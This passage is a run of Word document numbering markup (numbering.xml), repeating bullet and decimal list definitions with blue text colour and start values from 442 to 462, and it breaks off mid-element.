  <w:abstractNum w:abstractNumId="22357">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22358">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22359">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22360">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22361">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22362">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22363">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22364">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22365">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22366">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22367">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22368">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22369">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22370">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22371">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22372">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22373">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22374">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22375">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22376">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22377">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22378">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22379">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22380">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22381">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22382">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22383">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22384">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22385">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22386">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22387">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22388">
    <w:lvl>
      <w:start w:val="442"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22389">
    <w:lvl>
      <w:start w:val="443"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22390">
    <w:lvl>
      <w:start w:val="444"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22391">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22392">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22393">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22394">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22395">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22396">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22397">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22398">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22399">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22400">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22401">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22402">
    <w:lvl>
      <w:start w:val="445"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22403">
    <w:lvl>
      <w:start w:val="446"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22404">
    <w:lvl>
      <w:start w:val="447"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22405">
    <w:lvl>
      <w:start w:val="448"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22406">
    <w:lvl>
      <w:start w:val="449"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22407">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22408">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22409">
    <w:lvl>
      <w:start w:val="450"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22410">
    <w:lvl>
      <w:start w:val="451"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22411">
    <w:lvl>
      <w:start w:val="452"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22412">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22413">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22414">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22415">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22416">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22417">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22418">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22419">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22420">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22421">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22422">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22423">
    <w:lvl>
      <w:start w:val="453"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22424">
    <w:lvl>
      <w:start w:val="454"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22425">
    <w:lvl>
      <w:start w:val="455"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22426">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22427">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22428">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22429">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22430">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22431">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22432">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22433">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22434">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22435">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22436">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22437">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22438">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22439">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22440">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22441">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22442">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22443">
    <w:lvl>
      <w:start w:val="456"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22444">
    <w:lvl>
      <w:start w:val="457"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22445">
    <w:lvl>
      <w:start w:val="458"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22446">
    <w:lvl>
      <w:start w:val="459"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22447">
    <w:lvl>
      <w:start w:val="460"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22448">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22449">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22450">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22451">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22452">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22453">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22454">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22455">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22456">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22457">
    <w:lvl>
      <w:start w:val="461"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22458">
    <w:lvl>
      <w:start w:val="462"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22459">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22460">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22461">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22462">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22463">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
